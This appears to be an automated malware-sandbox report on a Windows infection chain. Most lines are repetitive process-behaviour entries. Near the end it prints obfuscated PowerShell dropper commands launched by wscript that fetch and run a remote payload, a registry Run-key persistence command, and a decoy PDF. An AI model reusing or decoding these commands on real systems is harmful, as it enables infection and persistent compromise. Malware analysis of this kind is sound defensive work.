                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5195Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4687Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6540Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3302Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8106Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1204Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2640Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2716Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 824Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 0000000D.00000002.2997271515.000000000776E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllilieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa D
                Source: powershell.exe, 00000003.00000002.3005727829.0000000007DB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: powershell.exe, 00000003.00000002.3005727829.0000000007DF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
                Source: powershell.exe, 00000001.00000002.1849799643.000001E7EA4F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3005727829.0000000007DF1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2953167032.000001C973A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2954438244.000001C979058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 0000000B.00000003.2165602421.000000000355B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} oou0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0070D430 LdrInitializeThunk,3_2_0070D430

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_1620.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi32_6272.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1620, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTR
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');whilJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs" Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Schr. an GGV bzgl. Schadenersatzes.pdf"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Boernehjaelpsdag='Flerbrugerudgaver';;$Anekdotiskes='Kvajer';;$Apathia='Gunbuilder';;$Meterologisk='Billioners174';;$Paracelsianism='Intervertebra';;$Claritude=$host.Name;function Ructation($Krselstiderne){If ($Claritude) {$Slutdatoerne=2} for ($Unglamorously=$Slutdatoerne;;$Unglamorously+=3){if(!$Krselstiderne[$Unglamorously]) { break }$Buckland+=$Krselstiderne[$Unglamorously]}$Buckland}function Fashioneringer($Marins){ .($Clodpoles) ($Marins)}$Paydays=Ructation ' ln eamtSp. yW BEreb C uL SiLeeDoNTrT';$Nedsivningsbekendtgrelsernes=Ructation 'FuMCroDazI iMelGolDeaSl/';$Kongeparrets=Ructation ' MTRilI.sr 1 f2';$Dorbugs28='An[ManP,e StBa. .sTmE RR ivTii c oERaP.ioC iF N UT.om Ac N,ea RGBeEAnrA ]Hy:Be:U.sKoENaC ouRaRMiiS T DYOmpStrA,o TReoPrCVeOHaLte=st$MoKBeoarnTiGRaE p .AKaRN RCrEdiTN.s';$Nedsivningsbekendtgrelsernes+=Ructation 'Bi5W .Re0Wi (PeWDiiManAnd 